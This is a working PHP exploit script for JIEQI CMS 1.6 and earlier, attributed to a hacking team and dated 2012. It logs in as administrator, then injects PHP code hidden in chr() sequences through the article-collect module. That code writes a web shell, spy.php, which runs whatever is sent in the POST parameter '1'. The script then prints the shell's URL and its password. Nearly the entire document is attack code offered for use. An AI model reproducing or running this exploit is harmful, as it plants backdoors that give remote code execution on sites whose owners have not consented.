杰奇JIEQIcms <=1.6 Administrator privilege getshell

环境要求: register_globals = On.

<?php
  /*
   * Date : 2012/4/24
   *  Team : H3xIe Security TeAm  2005 - 2012
   *  This exploit script is jqcms, It requires administrative privileges can.
   *
   * Welcome to We team WebSite.
   *  <http://www.hkmjj.com/>
   */
    ini_set('display_errors', 0);
    set_time_limit(0);
    define('ExcuteCode','/modules/article/admin/collect.php?action=collect&siteid=test&fromid=test&jieqi'.
    'Collectsite[test]=nig3h&jieqiCollectsite[test][enable]=1&jieqiCollect[subarticleid]=test;@fwrite(fo'.
    'pen(chr(115).chr(112).chr(121).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112'.
    ').chr(104).chr(112).chr(32).chr(101).chr(99).chr(104).chr(111).chr(40).chr(34).chr(58).chr(58).chr('.
    '72).chr(51).chr(120).chr(73).chr(101).chr(34).chr(41).chr(59).chr(101).chr(118).chr(97).chr(108).ch'.
    'r(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(49).chr(39).chr(93).chr(4'.
    '1).chr(59).chr(63).chr(62));//&jieqiCollect[articletitle]=test');
    if (count($argv) != 5) // Paramter Count
    {
        Load_banner();
        echo "[+] :: Usage   : php ".$argv[0]." <Host> <Path> <username> <password>\n";
        echo "[+] :: Example : php ".$argv[0]." localhost / admin 123456\n";
        echo "[+] :: Please enter paramter.\n";
        exit;
    }else
    {
        Load_banner();
        $host = $argv[1];
        $Path = $argv[2];
        $Session_username = $argv[3];
        $Session_password = $argv[4];
    }
    # Program Begin
    $POST_Login_Data = 'username='.$Session_username.'&password='.$Session_password.'&submit=%26nbsp%3B&action=login';
    $Login_Info = HTTP_ReadFile($host, 80, $Path.'/admin/login.php?do=submit', $POST_Login_Data, 2000, '', '', 'POST');
    if (!strpos($Login_Info, 'admin/index.php')) die('[-] Login Fail~ Username Or Password Error!');
    $Session_Arr = explode("\n", $Login_Info);
    $COOKIE_I = 0;
    foreach ($Session_Arr as $Line)
    {
        if (2 == $COOKIE_I) break;
        if(strpos($Line, 'Cookie') && 2 != $COOKIE_I)
        {
            $COOKIE_I++;
            $CookiesRequest = $Line;
        }
    }
    $SESSIONID = substr($CookiesRequest, strpos($CookiesRequest, ':') + 1);
    $Send_ID  = SessionID($SESSIONID);
    if ($Send_ID == '') $Send_ID = 'Get COOKIE fail!';
    echo('Administrator SessionID :  '.$Send_ID."\n");
    # Send Execute
    # ...
    $Login_Info = HTTP_ReadFile($host, 80, $Path.ExcuteCode, '', 100, '', $Send_ID, 'GET');
    $FileStatus = file_get_contents('http://'.$host.$Path.'/modules/article/admin/spy.php?'.mt_rand());
    if (strpos($FileStatus, 'H3xIe'))
    {
        PrintUrl('http://'.$host.$Path.'/modules/article/admin/spy.php');
    }else
        die('[-] Exploit fail!');
    # Program End
    function SessionID($Cookie_)
    {
        $Str = '';
        for ($I = 0;$I<=strlen($Cookie_);$I++)
        {
            if ($Cookie_[$I] == ';') break;
            $Str = $Str.$Cookie_[$I];
        }
        return trim($Str);
    }

    function Load_banner($Active = 0)
    {
         $_d0 = Chr(61);
         $_arr_style = array('+=', '@', '*', '$_');
         $str = array();
         $StrPic = "IyAgICAgIyMjIyMgICAgICAgIyMjIyMgIyMjIyAg\n".
                   "IyAgICAgIyAgICAgICAgICAgICAjICAgICAgICMg\n".
                   "IyMjIyAgIyAgICAgIyAgICMgICAjICAgICAgICM$_d0\n".
                   "IyAgICMgIyMjIyAgICMgIyAgICAjICAgICMjIyAg\n".
                   "IyAgICMgIyAgICAgICAjICAgICAjICAgICAgICM$_d0\n".
                   "IyAgICMgIyAgICAgICMgIyAgICAjICAgICAgICM$_d0\n".
                   "IyAgICMgIyMjIyMgIyAgICMgIyMjIyMgIyMjIyAg\n";
         printf("\n");
         $Style = array_rand($_arr_style);
         foreach($str = explode("\n", $StrPic) as $value)
         {
             $_ = Chr(32).base64_decode($value).Chr(32);
             printf(str_pad($_, 50, $_arr_style[$Style], STR_PAD_BOTH)."\n");
         }
         echo "\n[~] :: JQcms Administrator privilege ExPlOiT...\n";
         if ($Active) echo '[+] Wait...'."\n";
    }

    function PrintUrl($URI)
    {
        echo '[+] Result : '.$URI."\n";
        echo "[+] Msg    : Exploit Success! Password is : 1\n";
        echo '[+] +++++++++++++++++++++++'."\n";
    }

    function HTTP_ReadFile($host,$port,$path, $data,$timeout, $referer='', $cookie='', $method)
    {
        if ($method == 'GET'){$method_str= "GET $path HTTP/1.1\r\n";} else $method_str= "POST $path HTTP/1.1\r\n"; # Default POST
        $buffer='';
        $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
        if(!$fp) die("[-] Connect Error.\n");
        else
        {
          echo '+ Method : '.$method."\n";
          fputs($fp, $method_str); # Method
          fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/xaml+xml, application/x-ms-xbap,application/x-ms-application, */*\r\n");
          if (trim($referer) != '')
          fputs($fp, "Referer: $referer\r\n");
          if ($method == 'POST')
          fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
          if ($method == 'POST')
          fputs($fp, "Content-Length: ".strlen($data)."\r\n");
          fputs($fp, "Host: $host\r\n");
          fputs($fp, "Connection: Keep-Alive\r\n");
          if (isset($cookie))
          fputs($fp, "Cookie: $cookie\r\n");
          if ($method == 'POST')
          {
              fputs($fp, "Cache-Control: no-cache\r\n\r\n");
              fputs($fp, $data."\r\n");
          }
          fputs($fp, "\r\n");
          while(!feof($fp)) $buffer .= fgets($fp,4096);
          fclose($fp);
       }
       return $buffer;
    }
?>